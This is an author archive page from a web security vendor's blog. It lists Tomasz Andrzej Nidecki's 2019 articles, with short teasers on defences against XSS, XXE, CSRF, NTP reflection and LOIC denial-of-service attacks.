Author Archives Tomasz Andrzej Nidecki

THE AUTHOR

Tomasz Andrzej Nidecki
Principal Cybersecurity Writer

Tomasz Andrzej Nidecki (also known as tonid) is a Primary Cybersecurity Writer at Invicti, focusing on Acunetix. A journalist, translator, and technical writer with 25 years of IT experience, Tomasz has been the Managing Editor of the hakin9 IT Security magazine in its early years and used to run a major technical blog dedicated to email security.

A Typo Can Make You an Administrator

Web Security Zone | June 11, 2019 by Tomasz Andrzej Nidecki

You are a developer. You put a lot of effort into making sure that your code is safe. You never trust user input, you use the best security-related development libraries. And then you make one small typo and everything is ruined. This is not fiction….

Protecting Your Website against Low Orbit Ion Cannon

Web Security Zone | June 10, 2019 by Tomasz Andrzej Nidecki

The Low Orbit Ion Cannon (LOIC) is a tool that was developed by Praetox Technologies as a network stress testing application and then released into the public domain. This application is available as open source on Sourceforge.net and often used by malicious parties for DoS…

PHP Security Guide

Web Security Zone | May 30, 2019 by Tomasz Andrzej Nidecki

PHP remains the most popular server-side language for websites and web applications. According to the latest data from w3techs, it is used by 79% of websites whose server-side language is known. Therefore, secure PHP programming and configuration are of critical importance. There are more reasons,…

Chrome Tightens CSRF Protection

Web Security Zone | May 23, 2019 by Tomasz Andrzej Nidecki

The Chrome 76 browser, which is expected in July 2019, will include tighter controls for the SameSite cookie attribute. This attribute is used by website or web application developers when they set cookies. It specifies whether the cookie may be used in a third-party context….

Preventing NTP Reflection Attacks

Web Security Zone | May 20, 2019 by Tomasz Andrzej Nidecki

The Network Time Protocol (NTP) is the standard protocol for time synchronization in the IT industry. It is widely used by servers, mobile devices, endpoints, and network devices, irrespective of their vendor. The latest version of NTP (version 4) is defined in RFC 5905. The…

What Is Persistent XSS

Web Security Zone | May 13, 2019 by Tomasz Andrzej Nidecki

Persistent Cross-site Scripting (Stored XSS) attacks represent one of three major types of Cross-site Scripting. The other two types of attacks of this kind are Non-Persistent XSS (Reflected XSS) and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate…

What Is HSTS and Why Should I Use It?

Web Security Zone | May 8, 2019 by Tomasz Andrzej Nidecki

HSTS stands for HTTP Strict Transport Security. It is a method used by websites to declare that they should only be accessed using a secure connection (HTTPS). If a website declares an HSTS policy, the browser must refuse all HTTP connections and prevent users from…

XML External Entity Vulnerability in Internet Explorer

Web Security Zone | May 7, 2019 by Tomasz Andrzej Nidecki

When exploiting a typical XML External Entity (XXE) vulnerability, the attacker attempts to gain access to the content of files on a Web server. However, XXE vulnerabilities may also allow the attacker to steal private data from the user. Such a case was recently discovered…

Visit Us at the Malta A.I. & Blockchain Summit 2019

Events | April 29, 2019 by Tomasz Andrzej Nidecki

Acunetix will be exhibiting at the Spring Edition of the Malta A.I. & Blockchain Summit. The event will take place on May 23-24 at the Hilton Business Centre in St. Julian’s in Malta. The summit focuses on AI, Big Data, Blockchain, IoT, and Quantum Technologies…

Take action and discover your vulnerabilities